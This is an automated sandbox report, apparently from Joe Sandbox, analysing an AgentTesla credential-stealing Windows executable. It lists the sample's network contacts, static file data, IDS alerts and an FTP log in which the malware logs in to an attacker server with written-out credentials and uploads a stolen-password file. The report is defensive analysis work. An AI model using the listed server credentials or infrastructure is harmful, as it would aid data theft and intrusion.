                                http://www.founder.com.cn/cnQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fonts.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQ4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sakkal.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        190.107.177.239
                                        		ftp.valvulasthermovalve.clChile
                                        		265831SOCCOMERCIALWIRENETCHILELTDACLtrue
                                        173.231.16.76
                                        		api4.ipify.orgUnited States
                                        		18450WEBNXUSfalse

                                        General Information

                                        Joe Sandbox Version:37.0.0 Beryl
                                        Analysis ID:830848
                                        Start date and time:2023-03-20 18:31:07 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 41s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:Q4YODvoYjL.exe
                                        Original Sample Name:e30c67b19383f259d7414b763049eb2f.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:32:16API Interceptor1x Sleep call for process: Q4YODvoYjL.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q4YODvoYjL.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.8590585184951305
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:Q4YODvoYjL.exe
                                        File size:743936
                                        MD5:e30c67b19383f259d7414b763049eb2f
                                        SHA1:8a1465b73066cf8642d39c9ef2333d8361e9d177
                                        SHA256:182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
                                        SHA512:259d0ab342f9bbc514d57064203ef45f07f2236b50fae92c29842371350627ada09a745a48fefc0ec8f85f524dad7f0252ef807714d09991cffb633cb61578f7
                                        SSDEEP:12288:C4hmYMUnFW/NxBig0kCw7B89OFsFVLWJDGeVjhiPJ8MoN5oxbjS2RyXyabHWHRpe:C4hUDQNkCQoOFYVADxkBzO2xbjJyiSWE
                                        TLSH:8FF402742BEA9739F43297BE85A43545976E63B32717C84C04F211CE4BA3B435ED0A2B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..d..............0..D...........b... ........@.. ....................................@................................

                                        File Icon

                                        Icon Hash:209480e66eb84902

                                        Static PE Info

                                        General

                                        Entrypoint:0x4b62fe
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6417B720 [Mon Mar 20 01:30:08 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb62ab0x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1110.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb4e980x54.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xb43040xb4400False0.9267144699202496data7.867913508227014IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xb80000x11100x1200False0.73046875data6.632660853110352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xba0000xc0x200False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xb81000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_GROUP_ICON0xb8b8c0x14data
                                        RT_VERSION0xb8bb00x360data
                                        RT_MANIFEST0xb8f200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.5190.107.177.23949700549262851779 03/20/23-18:32:35.384138TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970054926192.168.2.5190.107.177.239
                                        192.168.2.5190.107.177.23949699212029927 03/20/23-18:32:35.159386TCP2029927ET TROJAN AgentTesla Exfil via FTP4969921192.168.2.5190.107.177.239

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 20, 2023 18:32:25.445375919 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:25.445451021 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:25.445578098 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:25.496216059 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:25.496239901 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.153322935 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.153417110 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:26.161086082 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:26.161137104 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.161732912 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.366749048 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.366868019 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:26.482625961 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:26.482650042 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.639955044 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.640053988 CET44349698173.231.16.76192.168.2.5
                                        Mar 20, 2023 18:32:26.640136957 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:26.641061068 CET49698443192.168.2.5173.231.16.76
                                        Mar 20, 2023 18:32:33.120982885 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:33.345351934 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:33.345468044 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:33.570523024 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:33.570781946 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:33.794442892 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:33.794506073 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:33.797815084 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:34.036129951 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:34.036413908 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:34.259531975 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:34.259732962 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:34.483745098 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:34.483958006 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:34.707490921 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:34.707700014 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:34.930713892 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:34.932552099 CET4970054926192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.060767889 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.158899069 CET5492649700190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:35.159116030 CET4970054926192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.159385920 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.383680105 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:35.384138107 CET4970054926192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.384181976 CET4970054926192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.560923100 CET4969921192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.609081030 CET5492649700190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:35.609458923 CET5492649700190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:35.609611034 CET4970054926192.168.2.5190.107.177.239
                                        Mar 20, 2023 18:32:35.610061884 CET2149699190.107.177.239192.168.2.5
                                        Mar 20, 2023 18:32:35.670270920 CET4969921192.168.2.5190.107.177.239

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 20, 2023 18:32:25.379782915 CET5029553192.168.2.58.8.8.8
                                        Mar 20, 2023 18:32:25.400003910 CET53502958.8.8.8192.168.2.5
                                        Mar 20, 2023 18:32:25.412838936 CET6084153192.168.2.58.8.8.8
                                        Mar 20, 2023 18:32:25.435102940 CET53608418.8.8.8192.168.2.5
                                        Mar 20, 2023 18:32:32.898178101 CET6189353192.168.2.58.8.8.8
                                        Mar 20, 2023 18:32:33.119693041 CET53618938.8.8.8192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Mar 20, 2023 18:32:25.379782915 CET192.168.2.58.8.8.80xc630Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.412838936 CET192.168.2.58.8.8.80x4bf1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:32.898178101 CET192.168.2.58.8.8.80x4e5Standard query (0)ftp.valvulasthermovalve.clA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                        Mar 20, 2023 18:32:33.119693041 CET8.8.8.8192.168.2.50x4e5No error (0)ftp.valvulasthermovalve.cl190.107.177.239A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • api.ipify.org

                                        FTP Packets

                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Mar 20, 2023 18:32:33.570523024 CET2149699190.107.177.239192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                        Mar 20, 2023 18:32:33.570781946 CET4969921192.168.2.5190.107.177.239USER cva19491@valvulasthermovalve.cl
                                        Mar 20, 2023 18:32:33.794506073 CET2149699190.107.177.239192.168.2.5331 User cva19491@valvulasthermovalve.cl OK. Password required
                                        Mar 20, 2023 18:32:33.797815084 CET4969921192.168.2.5190.107.177.239PASS LILKOOLL14!!
                                        Mar 20, 2023 18:32:34.036129951 CET2149699190.107.177.239192.168.2.5230 OK. Current restricted directory is /
                                        Mar 20, 2023 18:32:34.259531975 CET2149699190.107.177.239192.168.2.5200 OK, UTF-8 enabled
                                        Mar 20, 2023 18:32:34.259732962 CET4969921192.168.2.5190.107.177.239PWD
                                        Mar 20, 2023 18:32:34.483745098 CET2149699190.107.177.239192.168.2.5257 "/" is your current location
                                        Mar 20, 2023 18:32:34.483958006 CET4969921192.168.2.5190.107.177.239TYPE I
                                        Mar 20, 2023 18:32:34.707490921 CET2149699190.107.177.239192.168.2.5200 TYPE is now 8-bit binary
                                        Mar 20, 2023 18:32:34.707700014 CET4969921192.168.2.5190.107.177.239PASV
                                        Mar 20, 2023 18:32:34.930713892 CET2149699190.107.177.239192.168.2.5227 Entering Passive Mode (190,107,177,239,214,142)
                                        Mar 20, 2023 18:32:35.159385920 CET4969921192.168.2.5190.107.177.239STOR PW_user-632922_2023_03_20_18_32_31.html
                                        Mar 20, 2023 18:32:35.383680105 CET2149699190.107.177.239192.168.2.5150 Accepted data connection
                                        Mar 20, 2023 18:32:35.610061884 CET2149699190.107.177.239192.168.2.5226-File successfully transferred
                                        226-File successfully transferred226 0.225 seconds (measured here), 1.52 Kbytes per second

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:18:32:02
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Imagebase:0x820000
                                        File size:743936 bytes
                                        MD5 hash:E30C67B19383F259D7414B763049EB2F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:18:32:23
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Imagebase:0x5a0000
                                        File size:743936 bytes
                                        MD5 hash:E30C67B19383F259D7414B763049EB2F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        Disassembly

                                        No disassembly